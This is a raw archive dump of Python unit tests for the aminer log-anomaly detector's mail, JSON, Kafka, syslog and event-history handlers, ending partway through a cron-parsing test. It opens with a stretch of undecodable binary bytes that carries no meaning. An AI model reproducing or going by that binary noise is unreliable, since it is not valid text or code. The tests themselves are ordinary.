CL{G?Rhh C j:wRhh Cm$Q忔Rhh C XAA?Rhh CgSRhh C{ܔ῔Rhh C> 0?Rhh C셡Ȕ忔Rhh CTc1?Rhh CE"+h?Rhh CH"US?Rhh Cx9(Q?Rhh C* ;m?Rhh CgJ0?Rhh CU<[;ᅯRhh C@@Q ۿRhh CY@r=?Rhh CU?Rhh Ce?Rhh CΧ]?Rhh C̚?Rhh C~U翔Rhh C̉?Rhh ChF͝,t?Rhh C5(ؿRhh C0^/{?Rhh Cl?hVW鿔Rhh C4=Al俔Rhh CxM࿔Rhh C*#v῔Rhh C`G Z?Rhh C8bl]࿔Rhh C%?Rhh C;4V 濔Rhh CD Sǵ?Rhh CjڿRhh CX8޿Rhh Cje?Rhh CЙO~࿔Rhh C7%<ᅯRhh Cj?Rhh CDg'֠?Rhh C#+.?Rhh C@ k ҿRhh CJѡN㿔Rhh CZ?Rhh CH={Rhh C8H#ͿRhh C w4?Rhh Cm 濔Re](e](ee.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/events/000077500000000000000000000000001437606560100232705ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/events/DefaultMailNotificationEventHandlerTest.py000066400000000000000000000222741437606560100335470ustar00rootroot00000000000000import unittest import sys from aminer.parsing.MatchContext import MatchContext from aminer.parsing.FixedDataModelElement import FixedDataModelElement from time import time, sleep from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler # skipcq: BAN-B404 import subprocess from unit.TestBase import TestBase from datetime import datetime class DefaultMailNotificationEventHandlerTest(TestBase): """Unittests for the DefaultMailNotificationEventHandler.""" __expected_string = ' New value for pathes %s: %s\n%s: "%s" (%d lines)\n %s' mail_call = 'echo p | mail -u mail' mail_delete_call = 'echo d | mail -u mail' pid = b' pid=' test = 'Test.%s' datetime_format_string = '%Y-%m-%d %H:%M:%S' def test1log_multiple_lines_event(self): """ In this test case multiple lines should be received, before sending an email to root@localhost. Make sure no mail notifications are in /var/spool/mail/root, before running this test. This test case must wait some time to ensure, that the mail can be read. """ description = "Test1DefaultMailNotificationEventHandler" match_context = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element = fixed_dme.get_match_element("match", match_context) match_context = MatchContext(self.pid) fixed_dme2 = FixedDataModelElement('s2', self.pid) match_element2 = fixed_dme2.get_match_element("match", match_context) default_mail_notification_event_handler = DefaultMailNotificationEventHandler(self.analysis_context) self.analysis_context.register_component(self, description) t = time() log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element), t, self) default_mail_notification_event_handler.receive_event( self.test % self.__class__.__name__, 'New value for pathes %s, %s: %s' % ( 'match/s1', 'match/s2', repr(match_element.match_object)), [log_atom.raw_data, log_atom.raw_data], None, log_atom, self) t += 600 log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element), t, self) # set the next_alert_time instead of sleeping 10 seconds default_mail_notification_event_handler.next_alert_time = time() default_mail_notification_event_handler.receive_event( self.test % self.__class__.__name__, 'New value for pathes %s, %s: %s' % ( 'match/s1', 'match/s2', repr(match_element.match_object)), [log_atom.raw_data, log_atom.raw_data], None, log_atom, self) sleep(2) # skipcq: PYL-W1510, BAN-B602 result = subprocess.run(self.mail_call, shell=True, stdout=subprocess.PIPE) # skipcq: PYL-W1510, BAN-B602 subprocess.run(self.mail_delete_call, shell=True, stdout=subprocess.PIPE) if datetime.fromtimestamp(t - 600).strftime(self.datetime_format_string) not in str(result.stdout, 'utf-8'): print("ERROR: %s t-600 not found in mail!" % description, file=sys.stderr) if datetime.fromtimestamp(t).strftime(self.datetime_format_string) not in str(result.stdout, 'utf-8'): print("ERROR: %s t not found in mail!" % description, file=sys.stderr) self.assertTrue(self.__expected_string % ( "" + match_element.get_path() + ", " + match_element2.get_path(), repr(match_element.get_match_object()), self.__class__.__name__, description, 2, match_element.get_match_string().decode() + "\n " + match_element2.get_match_string().decode()) in str(result.stdout, 'utf-8'), msg="%s vs \n %s" % (self.__expected_string % ( match_element.get_path(), repr(match_element.get_match_object()), self.__class__.__name__, description, 1, match_element.get_match_string().decode() + "\n\n"), str(result.stdout, 'utf-8'))) self.assertTrue(self.__expected_string % ( "" + match_element.get_path() + ", " + match_element2.get_path(), repr(match_element.get_match_object()), self.__class__.__name__, description, 2, match_element.get_match_string().decode() + "\n " + match_element2.get_match_string().decode() + "\n\n") in str(result.stdout, 'utf-8')) def test2do_timer(self): """In this test case the functionality of the timer is tested. The eventCollectTime must not be 0.""" description = "Test2DefaultMailNotificationEventHandler" default_mail_notification_event_handler = DefaultMailNotificationEventHandler(self.analysis_context) self.analysis_context.register_component(self, description) t = time() match_context = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s3', self.pid) match_element = fixed_dme.get_match_element("match", match_context) log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element), t, self) default_mail_notification_event_handler.receive_event( self.test % self.__class__.__name__, 'New value for pathes %s: %s' % ( 'match/s3', repr(match_element.match_object)), [log_atom.raw_data], None, log_atom, self) t = 0 default_mail_notification_event_handler.do_timer(t) # skipcq: PYL-W1510, BAN-B602 result = subprocess.run(self.mail_call, shell=True, stdout=subprocess.PIPE) self.assertFalse(self.__expected_string % ( match_element.get_path(), repr(match_element.get_match_object()), self.__class__.__name__, description, 1, match_element.get_match_string().decode() + "\n\n") in str(result.stdout, 'utf-8')) t = time() default_mail_notification_event_handler.next_alert_time = t + 500 default_mail_notification_event_handler.do_timer(t) # skipcq: PYL-W1510, BAN-B602 result = subprocess.run(self.mail_call, shell=True, stdout=subprocess.PIPE) self.assertFalse(self.__expected_string % ( match_element.get_path(), repr(match_element.get_match_object()), self.__class__.__name__, description, 1, match_element.get_match_string().decode() + "\n\n") in str(result.stdout, 'utf-8')) default_mail_notification_event_handler.next_alert_time = t default_mail_notification_event_handler.do_timer(t) sleep(2) # skipcq: PYL-W1510, BAN-B602 result = subprocess.run(self.mail_call, shell=True, stdout=subprocess.PIPE) # skipcq: PYL-W1510, BAN-B602 subprocess.run(self.mail_delete_call, shell=True, stdout=subprocess.PIPE) if datetime.fromtimestamp(t).strftime(self.datetime_format_string) not in str(result.stdout, 'utf-8'): print("ERROR: %s t not found in mail!" % description, file=sys.stderr) self.assertTrue(self.__expected_string % ( match_element.get_path(), repr(match_element.get_match_object()), self.__class__.__name__, description, 1, match_element.get_match_string().decode() + "\n\n") in str(result.stdout, 'utf-8'), msg="%s vs \n %s" % ( self.__expected_string % ( match_element.get_path(), repr(match_element.get_match_object()), self.__class__.__name__, description, 1, match_element.get_match_string().decode() + "\n\n"), str(result.stdout, 'utf-8'))) def test3check_email_addresses(self): """Test if mail addresses are validated as expected.""" ac = self.analysis_context ac.aminer_config.config_properties[DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS] = "test123@gmail.com" ac.aminer_config.config_properties[DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_FROM_ADDRESS] = "test123@gmail.com" _ = DefaultMailNotificationEventHandler(ac) ac.aminer_config.config_properties[DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS] = "root@localhost" ac.aminer_config.config_properties[DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_FROM_ADDRESS] = "root@localhost" _ = DefaultMailNotificationEventHandler(ac) ac.aminer_config.config_properties[DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS] = "domain.user1@localhost" self.assertRaises(Exception, DefaultMailNotificationEventHandler, ac) ac.aminer_config.config_properties[DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_FROM_ADDRESS] = "domain.user1@localhost" self.assertRaises(Exception, DefaultMailNotificationEventHandler, ac) ac.aminer_config.config_properties[DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS] = "root@notLocalhost" ac.aminer_config.config_properties[DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_FROM_ADDRESS] = "root@localhost" self.assertRaises(Exception, DefaultMailNotificationEventHandler, ac) ac.aminer_config.config_properties[DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS] = "root@localhost" ac.aminer_config.config_properties[DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_FROM_ADDRESS] = "root@notLocalhost" self.assertRaises(Exception, DefaultMailNotificationEventHandler, ac) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/events/JsonConverterHandlerTest.py000066400000000000000000000052731437606560100306100ustar00rootroot00000000000000import time import unittest from aminer.events.JsonConverterHandler import JsonConverterHandler from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchContext import MatchContext from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase class JsonConverterHandlerTest(TestBase): """Unittests for the JsonConverterHandler.""" output_logline = True match_context = MatchContext(b' pid=') fixed_dme = FixedDataModelElement('s1', b' pid=') match_element = fixed_dme.get_match_element("match", match_context) t = time.time() test_detector = 'Analysis.TestDetector' event_message = 'An event happened!' sorted_log_lines = ['Event happend at /path/ 5 times.', '', '', '', ''] persistence_id = 'Default' description = 'jsonConverterHandlerDescription' expected_string = '{\n "AnalysisComponent": {\n "AnalysisComponentIdentifier": 0,\n' \ ' "AnalysisComponentType": "%s",\n "AnalysisComponentName": "%s",\n "Message": "%s",\n' \ ' "PersistenceFileName": "%s",\n "AffectedParserPaths": [\n "test/path/1",\n' \ ' "test/path/2"\n ]\n },\n "LogData": {\n "RawLogData": [\n " pid="\n ],\n ' \ '"Timestamps": [\n %s\n ],\n "DetectionTimestamp": %s,\n "LogLinesCount": 5,\n' \ ' "AnnotatedMatchElement": {\n "match/s1": " pid="\n }\n }%s\n}\n' def test1receive_expected_event(self): """In this test case a normal Event happens and the json output should be sent to a StreamPrinterEventHandler.""" json_converter_handler = JsonConverterHandler([self.stream_printer_event_handler], self.analysis_context) log_atom = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element), self.t, self) self.analysis_context.register_component(self, self.description) event_data = {'AnalysisComponent': {'AffectedParserPaths': ['test/path/1', 'test/path/2']}} json_converter_handler.receive_event(self.test_detector, self.event_message, self.sorted_log_lines, event_data, log_atom, self) detection_timestamp = None for line in self.output_stream.getvalue().split('\n'): if "DetectionTimestamp" in line: detection_timestamp = line.split(':')[1].strip(' ,') self.assertEqual(self.output_stream.getvalue(), self.expected_string % ( self.__class__.__name__, self.description, self.event_message, self.persistence_id, round(self.t, 2), detection_timestamp, "")) if __name__ == '__main__': unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/events/KafkaEventHandlerTest.py000066400000000000000000000107611437606560100300240ustar00rootroot00000000000000import time from kafka import KafkaConsumer from aminer.events.JsonConverterHandler import JsonConverterHandler from aminer.events.KafkaEventHandler import KafkaEventHandler from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchContext import MatchContext from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase class KafkaEventHandlerTest(TestBase): """Unittests for the KafkaEventHandler.""" output_logline = True kafka_topic = 'test_topic' kafka_group = 'test_group' consumer = None match_context = MatchContext(b' pid=') fixed_dme = FixedDataModelElement('s1', b' pid=') other_data = 4 match_element = fixed_dme.get_match_element("match", match_context) description = 'jsonConverterHandlerDescription' t = time.time() persistence_id = 'Default' test_detector = 'Analysis.TestDetector' event_message = 'An event happened!' sorted_log_lines = ['Event happend at /path/ 5 times.', '', '', '', ''] expected_string = '{\n "AnalysisComponent": {\n "AnalysisComponentIdentifier": 0,\n' \ ' "AnalysisComponentType": "%s",\n "AnalysisComponentName": "%s",\n "Message": "%s",\n' \ ' "PersistenceFileName": "%s",\n "AffectedParserPaths": [\n "test/path/1",\n' \ ' "test/path/2"\n ]\n },\n "LogData": {\n "RawLogData": [\n " pid="\n ],\n ' \ '"Timestamps": [\n %s\n ],\n "DetectionTimestamp": %s,\n "LogLinesCount": 5,\n' \ ' "AnnotatedMatchElement": {\n "match/s1": " pid="\n }\n }%s\n}\n' @classmethod def setUpClass(cls): """Start a KafkaConsumer.""" cls.consumer = KafkaConsumer( cls.kafka_topic, bootstrap_servers=['localhost:9092'], enable_auto_commit=True, consumer_timeout_ms=10000, group_id=cls.kafka_group, value_deserializer=lambda x: x.decode(), api_version=(2, 0, 1), auto_offset_reset='earliest') @classmethod def tearDownClass(cls): """Shutdown the KafkaConsumer.""" cls.consumer.close() def test1receive_serialized_data(self): """This unittest tests the receive_event method with serialized data from the JsonConverterHandler.""" json_converter_handler = JsonConverterHandler([self.stream_printer_event_handler], self.analysis_context) log_atom = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element), self.t, self) self.analysis_context.register_component(self, self.description) event_data = {'AnalysisComponent': {'AffectedParserPaths': ['test/path/1', 'test/path/2']}} json_converter_handler.receive_event(self.test_detector, self.event_message, self.sorted_log_lines, event_data, log_atom, self) output = self.output_stream.getvalue() kafka_event_handler = KafkaEventHandler(self.analysis_context, self.kafka_topic, { 'bootstrap_servers': ['localhost:9092'], 'api_version': (2, 0, 1)}) self.assertTrue(kafka_event_handler.receive_event(self.test_detector, self.event_message, self.sorted_log_lines, output, log_atom, self)) val = self.consumer.__next__().value detection_timestamp = None for line in val.split('\n'): if "DetectionTimestamp" in line: detection_timestamp = line.split(':')[1].strip(' ,') self.assertEqual(val, self.expected_string % ( self.__class__.__name__, self.description, self.event_message, self.persistence_id, round(self.t, 2), detection_timestamp, "")) def test2receive_non_serialized_data(self): """This unittest tests the receive_event method with not serialized data.""" log_atom = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element), self.t, self) self.analysis_context.register_component(self, self.description) event_data = {'AnalysisComponent': {'AffectedParserPaths': ['test/path/1', 'test/path/2']}} kafka_event_handler = KafkaEventHandler(self.analysis_context, self.kafka_topic, { 'bootstrap_servers': ['localhost:9092'], 'api_version': (2, 0, 1)}) self.assertFalse(kafka_event_handler.receive_event(self.test_detector, self.event_message, self.sorted_log_lines, event_data, log_atom, self)) self.assertRaises(StopIteration, self.consumer.__next__) logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/events/StreamPrinterEventHandlerTest.py000066400000000000000000000103111437606560100315750ustar00rootroot00000000000000import unittest from aminer.parsing.MatchContext import MatchContext from aminer.parsing.FixedDataModelElement import FixedDataModelElement from time import time from aminer.parsing.ParserMatch import ParserMatch from aminer.input.LogAtom import LogAtom from unit.TestBase import TestBase from datetime import datetime class StreamPrinterEventHandlerTest(TestBase): """Unittests for the StreamPrinterEventHandler.""" __expectedString = '%s New value for pathes %s: %s\n%s: "%s" (%d lines)\n%s\n' pid = b' pid=' test = 'Test.%s' match_s1 = 'match/s1' match_s2 = 'match/s2' new_val = 'New value for pathes %s, %s: %s' def test1log_multiple_lines_event(self): """In this test case the EventHandler receives multiple lines from the test class.""" description = "Test1StreamPrinterEventHandler" match_context = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element = fixed_dme.get_match_element("match", match_context) match_context = MatchContext(self.pid) fixed_dme2 = FixedDataModelElement('s2', self.pid) match_element2 = fixed_dme2.get_match_element("match", match_context) self.analysis_context.register_component(self, description) t = time() log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element), t, self) self.stream_printer_event_handler.receive_event( self.test % self.__class__.__name__, self.new_val % (self.match_s1, self.match_s2, repr(match_element.match_object)), [log_atom.raw_data, log_atom.raw_data], None, log_atom, self) self.assertEqual(self.output_stream.getvalue(), self.__expectedString % ( datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S"), match_element.get_path() + ", " + match_element2.get_path(), repr(match_element.get_match_object()), self.__class__.__name__, description, 2, " " + match_element.get_match_string().decode() + "\n " + match_element2.get_match_string().decode() + "\n")) def test2log_no_line_event(self): """In this test case the EventHandler receives no lines from the test class.""" description = "Test2StreamPrinterEventHandler" match_context = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element = fixed_dme.get_match_element("match", match_context) match_context = MatchContext(self.pid) fixed_dme2 = FixedDataModelElement('s2', self.pid) match_element2 = fixed_dme2.get_match_element("match", match_context) self.analysis_context.register_component(self, description) t = time() log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element), t, self) self.stream_printer_event_handler.receive_event( self.test % self.__class__.__name__, self.new_val % (self.match_s1, self.match_s2, repr(match_element.match_object)), [], None, log_atom, self) self.assertEqual(self.output_stream.getvalue(), self.__expectedString % ( datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S"), match_element.get_path() + ", " + match_element2.get_path(), repr(match_element.get_match_object()), self.__class__.__name__, description, 0, "")) def test3event_data_not_log_atom(self): """In this test case the EventHandler receives no logAtom from the test class and the method should raise an exception.""" description = "Test3StreamPrinterEventHandler" match_context = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element = fixed_dme.get_match_element("match", match_context) self.analysis_context.register_component(self, description) t = time() log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element), t, self) self.assertRaises(Exception, self.stream_printer_event_handler.receive_event, self.test % self.__class__.__name__, self.new_val % (self.match_s1, self.match_s2, repr(match_element.match_object)), [log_atom.raw_data, log_atom.raw_data], log_atom.get_parser_match(), self) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/events/SyslogWriterEventHandlerTest.py000066400000000000000000000133171437606560100314640ustar00rootroot00000000000000import unittest from aminer.parsing.MatchContext import MatchContext from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.events.SyslogWriterEventHandler import SyslogWriterEventHandler from time import time, sleep from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch import os from unit.TestBase import TestBase from datetime import datetime class SyslogWriterEventHandlerTest(TestBase): """Some of the test cases may fail if the same numbers as the PID are found in the syslog. Rerun the unit, when this happens.""" __expected_string = '[0] %s New value for pathes %s, %s: %s\n[0-1] %s: "%s" (%d lines)\n[0-2] %s\n[0-3] %s\n' __expected_string2 = '[0] %s New value for pathes %s, %s: %s\n[0-1] %s: "%s" (%d lines)\n' pid = b' pid=' test = 'Test.%s' match_s1 = 'match/s1' match_s2 = 'match/s2' new_val = 'New value for pathes %s, %s: %s' def test1log_multiple_lines_event(self): """In this test case the EventHandler receives multiple lines from the test class.""" description = "Test1SyslogWriterEventHandler" match_context = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element = fixed_dme.get_match_element("match", match_context) match_context = MatchContext(self.pid) fixed_dme2 = FixedDataModelElement('s2', self.pid) match_element2 = fixed_dme2.get_match_element("match", match_context) syslog_writer_event_handler = SyslogWriterEventHandler(self.analysis_context, 'aminer') self.analysis_context.register_component(self, description) t = time() log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element), t, self) syslog_writer_event_handler.receive_event( self.test % self.__class__.__name__, self.new_val % (self.match_s1, self.match_s2, repr(match_element.match_object)), [log_atom.raw_data, log_atom.raw_data], None, log_atom, self) string = '' sleep(0.2) with open("/var/log/syslog") as search: for line in search: line = line.rstrip() # remove '\n' at end of line if 'aminer[' + str(os.getpid()) + ']' in line: line = line.split("]: ") string += (line[1]) + '\n' found = False string = string.split('Syslog logger initialized\n') expected = self.__expected_string % ( datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S"), match_element.get_path(), match_element2.get_path(), repr(match_element.get_match_object()), self.__class__.__name__, description, 2, match_element.get_match_string().decode(), match_element2.get_match_string().decode()) for log in string: if expected in log: found = True self.assertTrue(found) def test2log_no_line_event(self): """In this test case the EventHandler receives no lines from the test class.""" description = "Test2SyslogWriterEventHandler" match_context = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element = fixed_dme.get_match_element("match", match_context) match_context = MatchContext(self.pid) fixed_dme2 = FixedDataModelElement('s2', self.pid) match_element2 = fixed_dme2.get_match_element("match", match_context) syslog_writer_event_handler = SyslogWriterEventHandler(self.analysis_context, 'aminer') self.analysis_context.register_component(self, description) t = time() log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element), t, self) syslog_writer_event_handler.receive_event( self.test % self.__class__.__name__, self.new_val % (self.match_s1, self.match_s2, repr(match_element.match_object)), [], None, log_atom, self) string = '' sleep(0.2) with open("/var/log/syslog") as search: for line in search: line = line.rstrip() # remove '\n' at end of line if 'aminer[' + str(os.getpid()) + ']' in line: line = line.split("]: ") string += (line[1]) + '\n' found = False string = string.split('Syslog logger initialized\n') expected = self.__expected_string2 % ( datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S"), match_element.get_path(), match_element2.get_path(), repr(match_element.get_match_object()), self.__class__.__name__, description, 0) for log in string: if expected in log: found = True self.assertTrue(found) def test3event_data_not_log_atom(self): """In this test case the EventHandler receives no logAtom from the test class and the class should raise an exception.""" description = "Test3SyslogWriterEventHandler" match_context = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element = fixed_dme.get_match_element("match", match_context) self.analysis_context.register_component(self, description) syslog_writer_event_handler = SyslogWriterEventHandler(self.analysis_context, 'aminer') t = time() log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element), t, self) self.assertRaises(Exception, syslog_writer_event_handler.receive_event, self.test % self.__class__.__name__, self.new_val % (self.match_s1, self.match_s2, repr(match_element.match_object)), [log_atom.raw_data, log_atom.raw_data], log_atom.get_parser_match(), self) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/events/UtilsTest.py000066400000000000000000000175061437606560100256130ustar00rootroot00000000000000import unittest from aminer.events.Utils import VolatileLogarithmicBackoffEventHistory from aminer.parsing.MatchContext import MatchContext from aminer.parsing.FixedDataModelElement import FixedDataModelElement from time import time from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase class UtilsTest(TestBase): """Unittests for the Utils.""" pid = b' pid=' test = 'Test.%s' match_s1 = 'match/s1' match_s2 = 'match/s2' new_val = 'New value for pathes %s, %s: %s ' def test1add_multiple_objects(self): """In this test case multiple events are received by the VolatileLogarithmicBackoffEventHistory.""" volatile_logarithmic_backoff_event_history = VolatileLogarithmicBackoffEventHistory(10) match_context = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element = fixed_dme.get_match_element("match", match_context) t = time() log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element), t, self) message = self.new_val % (self.match_s1, self.match_s2, repr(match_element.match_object)) volatile_logarithmic_backoff_event_history.receive_event(self.test % self.__class__.__name__, message, [ log_atom.raw_data, log_atom.raw_data], None, log_atom, self) self.assertEqual(volatile_logarithmic_backoff_event_history.get_history(), [ (0, self.test % self.__class__.__name__, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)]) volatile_logarithmic_backoff_event_history.receive_event(self.test % self.__class__.__name__, message, [ log_atom.raw_data, log_atom.raw_data], None, log_atom, self) self.assertEqual(volatile_logarithmic_backoff_event_history.get_history(), [ (0, self.test % self.__class__.__name__, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self), (1, self.test % self.__class__.__name__, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)]) def test2add_no_objects(self): """In this test case no events are received by the VolatileLogarithmicBackoffEventHistory.""" volatile_logarithmic_backoff_event_history = VolatileLogarithmicBackoffEventHistory(10) self.assertEqual(volatile_logarithmic_backoff_event_history.get_history(), []) def test3event_data_not_log_atom(self): """In this test case the EventHandler receives no logAtom from the test class and the output should not contain the log time.""" volatile_logarithmic_backoff_event_history = VolatileLogarithmicBackoffEventHistory(10) match_context = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element = fixed_dme.get_match_element("match", match_context) t = time() log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element), t, self) message = self.new_val % (self.match_s1, self.match_s2, repr(match_element.match_object)) volatile_logarithmic_backoff_event_history.receive_event(self.test % self.__class__.__name__, message, [ log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self) self.assertEqual( volatile_logarithmic_backoff_event_history.get_history(), [ (0, self.test % self.__class__.__name__, message, [ log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self)]) def test4max_items_overflow(self): """In this test case more events than the VolatileLogarithmicBackoffEventHistory can handle are received.""" deviation = 0.05 size = 100000 msg = "%s=%f is not between %f and %f" match_context = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element = fixed_dme.get_match_element("match", match_context) t = time() log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element), t, self) message = self.new_val % (self.match_s1, self.match_s2, repr(match_element.match_object)) first = 0 second = 0 third = 0 fourth = 0 for _ in range(size): volatile_logarithmic_backoff_event_history = VolatileLogarithmicBackoffEventHistory(2) volatile_logarithmic_backoff_event_history.receive_event(self.test % self.__class__.__name__, message, [ log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self) volatile_logarithmic_backoff_event_history.receive_event(self.test % self.__class__.__name__, message, [ log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self) volatile_logarithmic_backoff_event_history.receive_event(self.test % self.__class__.__name__, message, [ log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self) volatile_logarithmic_backoff_event_history.receive_event(self.test % self.__class__.__name__, message, [ log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self) volatile_logarithmic_backoff_event_history.receive_event(self.test % self.__class__.__name__, message, [ log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self) history = volatile_logarithmic_backoff_event_history.get_history() if history == [(0, self.test % self.__class__.__name__, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self), (4, self.test % self.__class__.__name__, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self)]: first += 1 elif history == [(1, self.test % self.__class__.__name__, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self), (4, self.test % self.__class__.__name__, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self)]: second += 1 elif history == [(2, self.test % self.__class__.__name__, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self), (4, self.test % self.__class__.__name__, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self)]: third += 1 elif history == [(3, self.test % self.__class__.__name__, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self), (4, self.test % self.__class__.__name__, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self)]: fourth += 1 val = 0.5 * 0.5 * 0.5 minimum = size * val * (1 - deviation) maximum = size * val * (1 + deviation) self.assertTrue(minimum <= first <= maximum, msg % ("first", first, minimum, maximum)) val = 0.5 * 0.5 * 0.5 minimum = size * val * (1 - deviation) maximum = size * val * (1 + deviation) self.assertTrue(minimum <= second <= maximum, msg % ("second", second, minimum, maximum)) val = 2 * 0.5 * 0.5 * 0.5 minimum = size * val * (1 - deviation) maximum = size * val * (1 + deviation) self.assertTrue(minimum <= third <= maximum, msg % ("third", third, minimum, maximum)) val = 0.5 minimum = size * val * (1 - deviation) maximum = size * val * (1 + deviation) self.assertTrue(minimum <= fourth <= maximum, msg % ("fourth", fourth, minimum, maximum)) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/events/__init__.py000066400000000000000000000000001437606560100253670ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/generic/000077500000000000000000000000001437606560100234005ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/generic/CronParsingModelTest.py000066400000000000000000000201731437606560100300230ustar00rootroot00000000000000# skipcq: FLK-D208 """package not used. import unittest from aminer.generic import CronParsingModel from aminer.parsing.MatchContext import MatchContext from unit.TestBase import TestBase ''' These testcases are testing the CronParsingModel with the Basis Path Testing method. The Modified Condition / Decisision Coverage is also accomplished, because the conditions are all simple, which means it is tested if the path is reached. The used paths can be seen in the provided flowchart. The child elements of the CronParsingModel could be tested, but they are assumed to be working as intended, because there should be individual test cases for every parser model. ''' class CronParsingModelTest(TestBase): ''' 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 7 -> 8 ''' def test1(self): self.matchContext = MatchContext(b'CRON[25537]: (root) CMD ping 8.8.8.8') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(b'CRON[25537]: (root) CMD ping 8.8.8.8', self.cronParsingModel.getMatchElement('stdExec', self.matchContext).getMatchString()) ''' 1 -> 18 -> 33 ''' def test2(self): self.matchContext = MatchContext(b'systemd[1]: Started Daily apt download activities.') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdExec', self.matchContext)) ''' 1 -> 2 -> 19 -> 33 ''' def test3(self): self.matchContext = MatchContext(b'CRON[ 25537 ]: (root) CMD ping 8.8.8.8') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdExec', self.matchContext)) ''' 1 -> 2 -> 3 -> 20 -> 33 ''' def test4(self): self.matchContext = MatchContext(b'CRON[25537]:(root) CMD ping 8.8.8.8') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdExec', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 9 -> 13 -> 14 -> 15 -> 16 -> 17 ''' def test5(self): self.matchContext = MatchContext(b'CRON[25537]: 